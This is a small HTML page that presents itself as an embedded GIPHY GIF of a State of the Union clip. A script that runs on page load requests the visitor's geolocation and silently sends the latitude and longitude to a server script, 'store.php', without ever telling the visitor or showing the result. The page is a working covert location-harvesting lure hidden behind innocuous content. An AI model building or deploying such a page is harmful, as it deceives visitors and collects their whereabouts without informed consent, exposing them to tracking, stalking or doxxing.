<!DOCTYPE html>
<html>
<body onload="getLocation()">

<iframe src="https://giphy.com/embed/fMFXBFoJwhDYYukUWA" width="480" height="284" frameBorder="0" class="giphy-embed" allowFullScreen></iframe><p><a href="https://giphy.com/gifs/pbsnewshour-state-of-the-union-sotu-2023-fMFXBFoJwhDYYukUWA">via GIPHY</a></p>



<p id="demo"></p>

<script>
var x = document.getElementById("demo");

function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
  } else { 
    x.innerHTML = "Geolocation is not supported by this browser.";
  }
}

function showPosition(position) {
  const xhttp = new XMLHttpRequest();
  xhttp.open("GET", "store.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude);
  xhttp.send();
  
}
</script>

</body>
</html>
